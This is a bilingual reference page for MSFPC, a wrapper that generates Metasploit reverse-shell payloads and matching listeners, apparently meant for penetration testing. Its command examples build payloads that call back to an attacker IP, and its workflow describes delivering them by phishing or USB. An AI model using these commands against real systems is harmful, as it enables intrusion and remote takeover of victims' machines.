MSFvenom Payload Creator (MSFPC)
Wrapper autour de msfvenom qui simplifie la génération des payloads Metasploit courants (exe, apk, war, etc.) avec les fichiers de ressources handler correspondants. Wrapper around msfvenom that simplifies generating common Metasploit payloads (exe, apk, war, etc.) with matching handler resource files.
↗ https://github.com/g0tmi1k/msfpcOverview
MSFPC wraps msfvenom to remove the friction of remembering exact payload names, encoders, and format flags. Give it a platform (or let it guess from a file extension) and an IP/port, and it generates the appropriate payload file plus a ready-to-use .rc resource script for multi/handler — so you can go from “I need a Windows exe payload” to a working listener in one command instead of hand-assembling the msfvenom invocation.
Common Usage
Auto-detect platform from output filename, staged TCP payload
msfpc.sh windows 10.10.14.5
Explicit payload type: Android APK, staged, reverse HTTPS
msfpc.sh apk 10.10.14.5 443 https
Linux ELF, x64, reverse TCP
msfpc.sh elf x64 10.10.14.5 4444 tcp
Stageless payload
msfpc.sh windows 10.10.14.5 4444 tcp stageless
Auto-start a matching multi/handler listener immediately after generation
msfpc.sh windows 10.10.14.5 loop
Typical Workflow
- Generate payload + handler resource script
msfpc.sh windows 10.10.14.5 4444 tcp exe
# 2. Deliver the generated .exe to the target (phishing, USB, upload, etc.)
- Start the matching listener using the auto-generated .rc file
msfconsole -r windows-meterpreter-staged-reverse-tcp-10.10.14.5-4444.rc
Notes
- Output filenames encode the payload type/platform/architecture/LHOST/LPORT, making it easy to track which listener matches which generated file.
loopmode keeps prompting for more payloads without re-entering flags, handy for generating several variants quickly.- Under the hood it’s still
msfvenom— encoding/obfuscation for AV evasion still needs to be layered on separately (it does not do that by itself).
Help / Man page
msfpc.sh <TYPE> <LHOST> <LPORT> <CMD> <STAGE> <METHOD> <OUTPATH> <BATCH> <LOOP> <VERBOSE> <HELP>
TYPE apk, asp, aspx, bash, exe, dll, elf, jar, jsp,
osx, php, powershell, python, war, ...
LHOST Local IP for the reverse connection (or 0.0.0.0 for bind)
LPORT Local port (default: 443)
CMD tcp | http | https | findport | ...
STAGE staged | stageless
METHOD reverse | bind
BATCH Generate for all platforms at once
LOOP Keep generating payloads in a loop
VERBOSE -v Verbose output
HELP -h Show help
Vue d’ensemble
MSFPC encapsule msfvenom pour éviter d’avoir à retenir les noms exacts des payloads, des encodeurs et des flags de format. Donnez-lui une plateforme (ou laissez-le la deviner depuis l’extension du fichier) ainsi qu’une IP/port, et il génère le fichier de payload approprié plus un script de ressources .rc prêt à l’emploi pour multi/handler : passez ainsi de « j’ai besoin d’un payload exe Windows » à un listener fonctionnel en une seule commande, au lieu d’assembler manuellement l’invocation msfvenom.
Utilisation courante
# Détection automatique de la plateforme depuis le nom de fichier de sortie, payload TCP staged
msfpc.sh windows 10.10.14.5
# Type de payload explicite : APK Android, staged, reverse HTTPS
msfpc.sh apk 10.10.14.5 443 https
# ELF Linux, x64, reverse TCP
msfpc.sh elf x64 10.10.14.5 4444 tcp
# Payload stageless
msfpc.sh windows 10.10.14.5 4444 tcp stageless
# Démarrer automatiquement un listener multi/handler correspondant juste après la génération
msfpc.sh windows 10.10.14.5 loop
Flux de travail typique
# 1. Générer le payload + le script de ressources handler
msfpc.sh windows 10.10.14.5 4444 tcp exe
# 2. Livrer le fichier .exe généré à la cible (phishing, USB, upload, etc.)
# 3. Démarrer le listener correspondant avec le fichier .rc généré automatiquement
msfconsole -r windows-meterpreter-staged-reverse-tcp-10.10.14.5-4444.rc
Remarques
- Les noms de fichiers de sortie encodent le type de payload/plateforme/architecture/LHOST/LPORT, ce qui facilite le suivi entre listener et fichier généré.
- Le mode
loopcontinue de demander d’autres payloads sans avoir à ressaisir les flags, pratique pour générer rapidement plusieurs variantes. - Sous le capot, c’est toujours
msfvenom: l’encodage/l’obfuscation pour l’évasion AV doit toujours être ajouté séparément (MSFPC ne le fait pas lui-même).
Aide / Page de manuel
msfpc.sh <TYPE> <LHOST> <LPORT> <CMD> <STAGE> <METHOD> <OUTPATH> <BATCH> <LOOP> <VERBOSE> <HELP>
TYPE apk, asp, aspx, bash, exe, dll, elf, jar, jsp,
osx, php, powershell, python, war, ...
LHOST Local IP for the reverse connection (or 0.0.0.0 for bind)
LPORT Local port (default: 443)
CMD tcp | http | https | findport | ...
STAGE staged | stageless
METHOD reverse | bind
BATCH Generate for all platforms at once
LOOP Keep generating payloads in a loop
VERBOSE -v Verbose output
HELP -h Show help